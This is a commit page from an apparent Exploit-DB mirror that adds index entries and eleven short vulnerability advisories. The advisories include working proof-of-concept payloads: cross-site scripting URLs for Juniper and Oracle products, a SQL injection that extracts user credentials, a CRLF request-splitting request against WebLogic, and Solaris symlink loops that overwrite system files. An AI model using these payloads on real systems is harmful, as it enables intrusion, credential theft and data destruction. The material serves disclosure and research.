bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 08_12_2014

Browse source
This commit is contained in:
Offensive Security 2014-08-12 04:39:36 +00:00
parent b3b8cbd244
commit 77dff34f06
12 changed files with 150 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

11
files.csv
View file

@ -30872,6 +30872,8 @@ id,file,description,date,author,platform,type,port
34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability",2010-07-05,"Luigi Auriemma",multiple,remote,0 34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability",2010-07-05,"Luigi Auriemma",multiple,remote,0
34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0 34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0
34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80 34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80
34278,platforms/linux/dos/34278.txt,"LibTIFF <= 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service Vulnerability",2010-07-12,"Tom Lane",linux,dos,0
34279,platforms/linux/dos/34279.txt,"LibTIFF <= 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service Vulnerability",2010-06-14,"Tom Lane",linux,dos,0
34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0 34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0
34281,platforms/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 File Processing Remote Denial of Service Vulnerability",2010-07-09,"Prashant Uniyal",windows,dos,0 34281,platforms/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 File Processing Remote Denial of Service Vulnerability",2010-07-09,"Prashant Uniyal",windows,dos,0
34282,platforms/php/webapps/34282.txt,"Real Estate Manager 1.0.1 'index.php' Cross-Site Scripting Vulnerability",2010-07-09,bi0,php,webapps,0 34282,platforms/php/webapps/34282.txt,"Real Estate Manager 1.0.1 'index.php' Cross-Site Scripting Vulnerability",2010-07-09,bi0,php,webapps,0
@ -30881,6 +30883,7 @@ id,file,description,date,author,platform,type,port
34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0 34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0
34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0 34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0
34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 'modules.php' Multiple SQL Injection Vulnerabilities",2009-12-22,"Hadi Kiamarsi",php,webapps,0 34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 'modules.php' Multiple SQL Injection Vulnerabilities",2009-12-22,"Hadi Kiamarsi",php,webapps,0
34289,platforms/php/webapps/34289.txt,"Web Cocoon simpleCMS - 'show.php' SQL Injection Vulnerability",2009-12-21,anonymous,php,webapps,0
34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 'searchString' Parameter Cross Site Scripting Vulnerability",2010-07-11,10n1z3d,java,webapps,0 34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 'searchString' Parameter Cross Site Scripting Vulnerability",2010-07-11,10n1z3d,java,webapps,0
34291,platforms/php/webapps/34291.txt,"Joomla! Rapid-Recipe Component HTML Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 34291,platforms/php/webapps/34291.txt,"Joomla! Rapid-Recipe Component HTML Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0
34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 Multiple Cross Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 Multiple Cross Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0
@ -30899,3 +30902,11 @@ id,file,description,date,author,platform,type,port
34306,platforms/hardware/dos/34306.txt,"SHARP MX Series - Denial of Service",2014-08-09,pws,hardware,dos,23 34306,platforms/hardware/dos/34306.txt,"SHARP MX Series - Denial of Service",2014-08-09,pws,hardware,dos,23
34307,platforms/hardware/dos/34307.txt,"Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm",2014-08-09,"Matt O'Connor",hardware,dos,0 34307,platforms/hardware/dos/34307.txt,"Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm",2014-08-09,"Matt O'Connor",hardware,dos,0
34308,platforms/php/webapps/34308.txt,"TomatoCart 1.x - SQL Injection Vulnerability",2014-08-09,Breaking.Technology,php,webapps,80 34308,platforms/php/webapps/34308.txt,"TomatoCart 1.x - SQL Injection Vulnerability",2014-08-09,Breaking.Technology,php,webapps,80
34309,platforms/solaris/dos/34309.txt,"Oracle Solaris 'rdist' Local Privilege Escalation Vulnerability",2010-07-13,"Monarch Rich",solaris,dos,0
34310,platforms/multiple/remote/34310.txt,"Oracle Business Process Management <= 10.3.2 Cross Site Scripting Vulnerability",2010-07-13,Markot,multiple,remote,0
34311,platforms/solaris/local/34311.sh,"Oracle Solaris 8/9/10 'flar' Insecure Temporary File Creation Vulnerability",2010-07-12,"Frank Stuart",solaris,local,0
34312,platforms/multiple/remote/34312.txt,"Oracle WebLogic Server <= 10.3.3 Encoded URL Remote Vulnerability",2010-07-13,"Timothy D. Morgan",multiple,remote,0
34313,platforms/solaris/local/34313.txt,"Oracle Solaris 'nfslogd' Insecure Temporary File Creation Vulnerability",2010-07-13,"Frank Stuart",solaris,local,0
34314,platforms/solaris/local/34314.sh,"Oracle Solaris Management Console WBEM Insecure Temporary File Creation Vulnerability",2010-07-13,"Frank Stuart",solaris,local,0
34315,platforms/php/webapps/34315.txt,"The Next Generation of Genealogy Sitebuilding 'searchform.php' Cross Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0
34316,platforms/hardware/remote/34316.txt,"Juniper Networks SA2000 SSL VPN Appliance 'welcome.cgi' Cross Site Scripting Vulnerability",2010-06-09,"Richard Brain",hardware,remote,0

Can't render this file because it is too large.

9
platforms/hardware/remote/34316.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41664/info
Juniper Networks SA2000 SSL VPN appliance is prone to a cross-site scripting vulnerability because the web interface fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Juniper Networks SA2000 running IVE OS 6.5R1 (Build 14599) are vulnerable; other models and versions may also be affected.
http://www.example.com/dana-na/auth/url_default/welcome.cgi?p=logout&c=37&u=</script><script>alert(1)</script>

7
platforms/linux/dos/34278.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/41475/info
LibTIFF is prone to a denial-of-service vulnerability because it fails to properly validate user-supplied input.
An attacker can exploit this issue to crash an application that uses the vulnerable library, denying service to legitimate users.
http://www.exploit-db.com/sploits/34278.tif

7
platforms/linux/dos/34279.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/41477/info
LibTIFF is prone to a denial-of-service vulnerability because it fails to properly validate user-supplied input.
An attacker can exploit this issue to crash an application that uses the vulnerable library, denying service to legitimate users.
http://www.exploit-db.com/sploits/34279.tif

11
platforms/multiple/remote/34310.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/41617/info
Oracle Business Process Management is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
This vulnerability affects the following supported versions:
5.7 MP3, 6.0 MP5, 10.3 MP2
http://www.example.com:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert(document.cookie)</script>
http://www.example.com:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert('CorelanTeam')</script>

18
platforms/multiple/remote/34312.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/41620/info
Oracle WebLogic Server is prone to a remote vulnerability.
The vulnerability can be exploited over the 'HTTP' protocol. For an exploit to succeed, the attacker must have 'Plugins for Apache, Sun and IIS web servers' privileges.
This vulnerability affects the following supported versions:
7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, 10.3.3
The following example requests are available:
GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
Host: vulnerable.example.com
Connection: close
GET /logo.gif%20HTTP/1.1%0d%0aHost:%20vulnerable.example.com%0d%0a%0d%0aGET%20/inject.gif HTTP/1.1
Host: vulnerable.example.com

7
platforms/php/webapps/34289.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/41526/info
Web Cocoon simpleCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/content/post/show.php?id=xek' union select null,concat_ws(0x3a,username,password),null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null from user -- &mode=post&gfile=show

9
platforms/php/webapps/34315.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41656/info
The Next Generation of Genealogy Sitebuilding is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The Next Generation of Genealogy Sitebuilding 7.1.2 is vulnerable.
http://www.example.com/searchform.php?msg="/><script>alert('XSS')</script>

12
platforms/solaris/dos/34309.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/41612/info
Oracle Solaris is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
The following products are affected:
Solaris 10
OpenSolaris
/usr/bin/rdist -cDwh file_that_is_hardlink rlogin_host:LONG_STRING

18
platforms/solaris/local/34311.sh Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/41619/info
Oracle Solaris is prone to an insecure temporary file creation vulnerability.
A local attacker can exploit this issue to overwrite arbitrary files with the privileges of the affected process. This will likely result in denial-of-service conditions, other attacks may also be possible.
Oracle Solaris 8, 9 and 10 are vulnerable.
$ x=0
$ while [ "$x" -le 30000 ];do
> ln -s /etc/important /tmp/.flash_filter_one_.$x
> x=$(expr "$x" + 1)
> done
Later, when root creates a flash archive with:
# flar create -n junk `pwd`/junk.flar

19
platforms/solaris/local/34313.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/41637/info
Oracle Solaris is prone to an insecure temporary file creation vulnerability.
A local attacker can exploit this issue to overwrite arbitrary files with the privileges of the affected process. This will likely result in denial-of-service conditions, other attacks may also be possible.
This vulnerability affects the following supported versions:
8, 9, 10, OpenSolaris
nnDon't Panic! # ls -dl /etc/oops
/etc/oops: No such file or directory
Don't Panic! # ls -dl /tmp/.nfslogd.pid
lrwxrwxrwx 1 nobody nobody 9 Dec 29 21:24 /tmp/.nfslogd.pid
-> /etc/oops
Don't Panic! # id
uid=0(root) gid=0(root)
Don't Panic! # /usr/lib/nfs/nfslogd
Don't Panic! # ls -dl /etc/oops
-rw------- 1 root root 4 Dec 29 21:25 /etc/oops

22
platforms/solaris/local/34314.sh Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/41642/info
The 'Solaris Management Console' sub component of Oracle Solaris creates temporary files in an insecure manner.
An attacker with local access can exploit this issue to overwrite arbitrary files. This may result in denial-of-service conditions or could aid in other attacks.
Solaris 9 and 10 are affected.
$ id
uid=101(fstuart) gid=14(sysadmin)
$ cd /tmp
$ x=0
$ while [ "$x" -ne 30000 ] ;do
> ln -s /etc/important /tmp/dummy.$x
> x=$(expr "$x" + 1)
> done
$ ls -dl /etc/important
-rw-r--r-- 1 root root 38 Jan 3 22:43 /etc/important
$ cat /etc/important
This is an important file!
EOF